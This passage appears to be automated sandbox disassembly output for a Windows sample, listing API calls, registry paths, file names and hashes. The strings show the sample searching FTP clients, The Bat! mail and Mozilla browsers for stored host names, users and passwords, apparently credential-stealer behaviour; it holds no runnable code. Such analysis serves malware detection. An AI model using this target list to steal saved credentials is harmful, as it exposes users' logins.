                  • Instruction ID: 149315b3b7d40ce8fe94d34389e19c2d4a991ddf4f61bed643bfa2bff0e59c54
                  • Opcode Fuzzy Hash: fb50987f158ec55cfe2bb98806428d2a930dfc83a1c3585cb17d9350d07b801a
                  • Instruction Fuzzy Hash: A611D431240219BADB21BF52CD42FC93A69AB48B04F50C07AB704751E3DFF98ED09A98
                  APIs
                  • StrStrA.SHLWAPI(007200D8,unleap.exe), ref: 00407693
                  • lstrlen.KERNEL32(unleap.exe,00000001,007200D8,unleap.exe), ref: 004076AC
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  • StrStrIA.SHLWAPI(007203F8,leapftp,007200D8,unleap.exe), ref: 004076F0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                  • API String ID: 1884169789-1497043051
                  • Opcode ID: af4d8a99ae7d6717864c20f85514df29d3cffccb4e66039880575eb1ac25d03b
                  • Instruction ID: ca438b8d423bcd58eb69d4cbe9981110522e53291ca9e45b99f12488e8eba69f
                  • Opcode Fuzzy Hash: af4d8a99ae7d6717864c20f85514df29d3cffccb4e66039880575eb1ac25d03b
                  • Instruction Fuzzy Hash: 2121C870A441047DEB213B31CD02FAE3E1ADF84794F244437B912B61E3D7BD6AA2929D
                  APIs
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  • wsprintfA.USER32 ref: 0040EC23
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocalwsprintf
                  • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                  • API String ID: 988369812-1921698578
                  • Opcode ID: 111e2f18cc080e312094e3f199f6637e13ef9141b0adfb92f192eb5c2020bf9f
                  • Instruction ID: b8460b7012a66b18e4ab8811a7bc871307c8c31403b4ecf2b79765d56f7371ef
                  • Opcode Fuzzy Hash: 111e2f18cc080e312094e3f199f6637e13ef9141b0adfb92f192eb5c2020bf9f
                  • Instruction Fuzzy Hash: C931E131A04108FADF11AF91DD42ADE7B75AB04714F204877F511751F1D7BA9B60AB48
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404898
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocDirectoryLocalWindows
                  • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                  • API String ID: 3186838798-3636168975
                  • Opcode ID: ffea5e168f270e24eb25b05d6cc74e16a969fd76c9c952f636d6df37aa190e76
                  • Instruction ID: ff12591b31ff326238e2f8ff1c408cb403752ed0395ffe955c3525f53abc4278
                  • Opcode Fuzzy Hash: ffea5e168f270e24eb25b05d6cc74e16a969fd76c9c952f636d6df37aa190e76
                  • Instruction Fuzzy Hash: 2F41F0B0A80104BAEF213B62CD43F9D7E65EB55748F10853BB700B90F2DBBD99A0965C
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040454E
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404582
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004046A9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: HostName$Password$User
                  • API String ID: 1332880857-1253078594
                  • Opcode ID: c3b991bb0fe04561cae893e15422e5c563704640a4d9e7a21aec12efcae835ee
                  • Instruction ID: dbef1a4a2983c09e8c68882a36fea80571c83e5172a5b0cd2e157321f814a4e2
                  • Opcode Fuzzy Hash: c3b991bb0fe04561cae893e15422e5c563704640a4d9e7a21aec12efcae835ee
                  • Instruction Fuzzy Hash: E331A77194011CBADF227B51CC42BDD7BB9BF44308F10C4BAB645750B1DBBA5A91AF88
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408A02
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408A36
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408B28
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                  • API String ID: 1332880857-3184955129
                  • Opcode ID: d5dd535362712fa5a46c74c6496d1ec087d2de753653d067e406bb6c2482dc77
                  • Instruction ID: a70945101c84c7ac796ce7a614a6bd97096326bed53b746d6beeb2bdcda40b4a
                  • Opcode Fuzzy Hash: d5dd535362712fa5a46c74c6496d1ec087d2de753653d067e406bb6c2482dc77
                  • Instruction Fuzzy Hash: 9E31F83190010DBADF216F61CD42FDD7ABABF04344F10C4BAB554B50A2DFB95A91AF98
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409A0A
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409A4F
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(?), ref: 00401C42
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(00000000,?), ref: 00401C4C
                    • Part of subcall function 00401C21: lstrcpy.KERNEL32(00000000,?), ref: 00401C60
                    • Part of subcall function 00401C21: lstrcat.KERNEL32(00000000,00000000), ref: 00401C69
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                  • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                  • API String ID: 3007406096-624000163
                  • Opcode ID: 077474363eb1cb21634e0b13a7f884a159e08b407b3dd271821e8b6df93273d4
                  • Instruction ID: 067d11940ba8822908139912771a022fcba50eecc684ffed189774b448b63df1
                  • Opcode Fuzzy Hash: 077474363eb1cb21634e0b13a7f884a159e08b407b3dd271821e8b6df93273d4
                  • Instruction Fuzzy Hash: A4015E70640208B9DB217F61CC47FDA3EA89B08B49F10807ABA04751E7DBB9CB909A5C
                  APIs
                  • StrStrIA.SHLWAPI(?,?), ref: 0040982A
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(?), ref: 00401C42
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(00000000,?), ref: 00401C4C
                    • Part of subcall function 00401C21: lstrcpy.KERNEL32(00000000,?), ref: 00401C60
                    • Part of subcall function 00401C21: lstrcat.KERNEL32(00000000,00000000), ref: 00401C69
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                  • String ID: PathToExe
                  • API String ID: 3012581338-1982016430
                  • Opcode ID: 6c3ee56b1af1d609d7f11486cfbfb07c182c8bca4d67ddacbaab2672a77783be
                  • Instruction ID: 4240f0cea3594d7691bdb638aaead59f9fffd590682c6645e5e2c10b6cb559ff
                  • Opcode Fuzzy Hash: 6c3ee56b1af1d609d7f11486cfbfb07c182c8bca4d67ddacbaab2672a77783be
                  • Instruction Fuzzy Hash: 27310F71910109BADF017FA1CD02EEE7A75FF05344F10443ABA11B51F2DBBA8E60AB69
                  APIs
                  • GetTempPathA.KERNEL32(00000104,?), ref: 00402602
                  • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 00402684
                  • GlobalLock.KERNEL32(?), ref: 00402690
                  • GlobalUnlock.KERNEL32(?), ref: 004026B2
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(?), ref: 00401C42
                    • Part of subcall function 00401C21: lstrlen.KERNEL32(00000000,?), ref: 00401C4C
                    • Part of subcall function 00401C21: lstrcpy.KERNEL32(00000000,?), ref: 00401C60
                    • Part of subcall function 00401C21: lstrcat.KERNEL32(00000000,00000000), ref: 00401C69
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
                  • String ID: Software\WinRAR
                  • API String ID: 2536169780-224198155
                  • Opcode ID: 1187d3a3ac6e2532d8f5cc01240ee3561c668e13f9ba7699e1051f0c0d89f365
                  • Instruction ID: 2abfcd972a9822b01129ef8867a75c560604cbfc2d7908670ee80c51707ce61e
                  • Opcode Fuzzy Hash: 1187d3a3ac6e2532d8f5cc01240ee3561c668e13f9ba7699e1051f0c0d89f365
                  • Instruction Fuzzy Hash: C3212C7190010DBADF11BBE1CD46DDE7B79AB04348F104877B600F10F2EBBA9A949B68
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00404440
                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 00404479
                  • StrStrIA.SHLWAPI(?,Line), ref: 004044AA
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 0040452F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID: Line
                  • API String ID: 4012628704-1898322888
                  • Opcode ID: 9dc5b1b612268df97d841b8a8d495a88f1f2b345677e12d1725af5aa0e4e1e7d
                  • Instruction ID: f91f4e1feec9d5ad625a7b2a9fab21848115cfa1c53827807270e1285b900478
                  • Opcode Fuzzy Hash: 9dc5b1b612268df97d841b8a8d495a88f1f2b345677e12d1725af5aa0e4e1e7d
                  • Instruction Fuzzy Hash: C421197180001CBADF21AB91CD41BDDBBB9BF41304F10C0B7B644B51A1DBBA9A95EF99
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DF75
                  • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040DFAE
                  • StrStrIA.SHLWAPI(?,.wjf), ref: 0040DFF5
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E022
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID: .wjf
                  • API String ID: 4012628704-198459012
                  • Opcode ID: 4f05375757efe4b6d3688668ce3f3ea3473d9cca9a06c75d9ea5d1bdf91f0b83
                  • Instruction ID: 43279a2a018755c5e1060965d219f417e113db824b34a168a00d580839c9dc7a
                  • Opcode Fuzzy Hash: 4f05375757efe4b6d3688668ce3f3ea3473d9cca9a06c75d9ea5d1bdf91f0b83
                  • Instruction Fuzzy Hash: 5C11263191001DBACF11AF91CC01AEEBBB8BF00304F1084B6A545B51A1DBBA9B95AF99
                  APIs
                    • Part of subcall function 004025CC: GetTempPathA.KERNEL32(00000104,?), ref: 00402602
                    • Part of subcall function 004025CC: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 00402684
                    • Part of subcall function 004025CC: GlobalLock.KERNEL32(?), ref: 00402690
                    • Part of subcall function 004025CC: GlobalUnlock.KERNEL32(?), ref: 004026B2
                  • CoCreateGuid.OLE32(?,00000000), ref: 004041AC
                  • wsprintfA.USER32 ref: 004041F3
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004041FF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                  • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                  • API String ID: 1852535927-1100116640
                  • Opcode ID: 840eb3ad66c41fe263eb2eafe22b724e0cc44c758affdf0c72c0414b0100f10f
                  • Instruction ID: c4e1b62278512b928dcdde7341008605bb0b3f4c3d7ab357c6a060e116bdcc76
                  • Opcode Fuzzy Hash: 840eb3ad66c41fe263eb2eafe22b724e0cc44c758affdf0c72c0414b0100f10f
                  • Instruction Fuzzy Hash: 07111BA69041A97DDB61E3F64C05DFFBAFC590D205B1401ABBA90E20C2E67DD7409B38
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409954
                    • Part of subcall function 0040981E: StrStrIA.SHLWAPI(?,?), ref: 0040982A
                    • Part of subcall function 0040981E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                    • Part of subcall function 0040981E: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                    • Part of subcall function 0040981E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409999
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                  • API String ID: 3062143572-2631691096
                  • Opcode ID: b864d701e8e15c7e68fa2287fc1162954e377e81177388ab5f0c84afc04fd57d
                  • Instruction ID: 7b62cf37f070a4fb375d2b5b1302e7b5f4762ac1398b9eae7c482788379758ad
                  • Opcode Fuzzy Hash: b864d701e8e15c7e68fa2287fc1162954e377e81177388ab5f0c84afc04fd57d
                  • Instruction Fuzzy Hash: 1CF03031640208BADB21BF51DD43FC97EA9AB08B48F508066B604751E3DBF99BD09B4C
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409A91
                    • Part of subcall function 0040981E: StrStrIA.SHLWAPI(?,?), ref: 0040982A
                    • Part of subcall function 0040981E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                    • Part of subcall function 0040981E: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                    • Part of subcall function 0040981E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409AD6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                  • API String ID: 3062143572-164276155
                  • Opcode ID: c03f42ead4cdf643d7099342c91f6daac96ae31a6cfeadbc48a658cf60dfd6c9
                  • Instruction ID: c662e76dbef64a068a92444c77d56f754835518ac613da1a147b232d30860ea1
                  • Opcode Fuzzy Hash: c03f42ead4cdf643d7099342c91f6daac96ae31a6cfeadbc48a658cf60dfd6c9
                  • Instruction Fuzzy Hash: 84F09670640208BADB20BF51CC03FC93EB8AB08705F508066B604751E7DBF99BD09B4C
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B18
                    • Part of subcall function 0040981E: StrStrIA.SHLWAPI(?,?), ref: 0040982A
                    • Part of subcall function 0040981E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                    • Part of subcall function 0040981E: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                    • Part of subcall function 0040981E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409B5D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Flock$Software\Mozilla$\Flock\Browser\
                  • API String ID: 3062143572-1276807325
                  • Opcode ID: 39e9080a4629d2c137f4b2ce5545a2bb9fff7d0a9044e6c14ccc3c37974c2919
                  • Instruction ID: a515aee1485dadb476b2cec9ed0f6dd48552a6037751f694a694d3432716905f
                  • Opcode Fuzzy Hash: 39e9080a4629d2c137f4b2ce5545a2bb9fff7d0a9044e6c14ccc3c37974c2919
                  • Instruction Fuzzy Hash: 9AF03C31540208B9DB21BF51CD43FC97EA55B08709F508066B644751E3DBF99FD09B4C
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B9F
                    • Part of subcall function 0040981E: StrStrIA.SHLWAPI(?,?), ref: 0040982A
                    • Part of subcall function 0040981E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 004098A1
                    • Part of subcall function 0040981E: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 004098CD
                    • Part of subcall function 0040981E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409915
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409BE4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                  • API String ID: 3062143572-2716603926
                  • Opcode ID: 35396ce86b8c1788ae7f3e08cc35d1e1cac5d3709b2988d68ad3a82d525ea0fd
                  • Instruction ID: f2f27d82559fd93f4aef7c5dd116634fbea4d9850910639050c9cfc33e221ced
                  • Opcode Fuzzy Hash: 35396ce86b8c1788ae7f3e08cc35d1e1cac5d3709b2988d68ad3a82d525ea0fd
                  • Instruction Fuzzy Hash: A0F0FF31640208BADB21BF61CD46FC97EA99B08709F508066B708751E3DBB99AD09B48
                  APIs
                  • StrStrIA.SHLWAPI(007200D8,3D-FTP), ref: 0040C662
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                  • API String ID: 1884169789-4074339522
                  • Opcode ID: ffa0572995a0a9c20b75555718e68e314bfe6d377330d184481ef0f8697a6f48
                  • Instruction ID: 05781279a1ca6ad0879fa58fbbf1fa8e39e2ddecbbd928bb128e0cd783bf3fcc
                  • Opcode Fuzzy Hash: ffa0572995a0a9c20b75555718e68e314bfe6d377330d184481ef0f8697a6f48
                  • Instruction Fuzzy Hash: 29118A70A40106B9EB213B758D43F6E6D5E9B40B44F140A3BB905B61F3DABEDF81926C
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AACF
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AB03
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040ABEB
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A88C
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A89F
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A8B2
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A8C5
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A8D8
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A8EB
                    • Part of subcall function 0040A820: wsprintfA.USER32 ref: 0040A8FE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: wsprintf$CloseEnumOpen
                  • String ID: SiteServers
                  • API String ID: 1693054222-2402683488
                  • Opcode ID: 842825de6b12b5884e4bf6c3bbd2820ca561ba5566c8314c0948b6f73f529da8
                  • Instruction ID: ed54c4af48630386b875223b5aacfa6e9f83f9959f85fd59627ed8d9c20c5b6f
                  • Opcode Fuzzy Hash: 842825de6b12b5884e4bf6c3bbd2820ca561ba5566c8314c0948b6f73f529da8
                  • Instruction Fuzzy Hash: 2D310D3190021CEADF21AB91CD02BDDBBB9BF04304F14C0B6E645751A1DB795B92DF9A
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408913
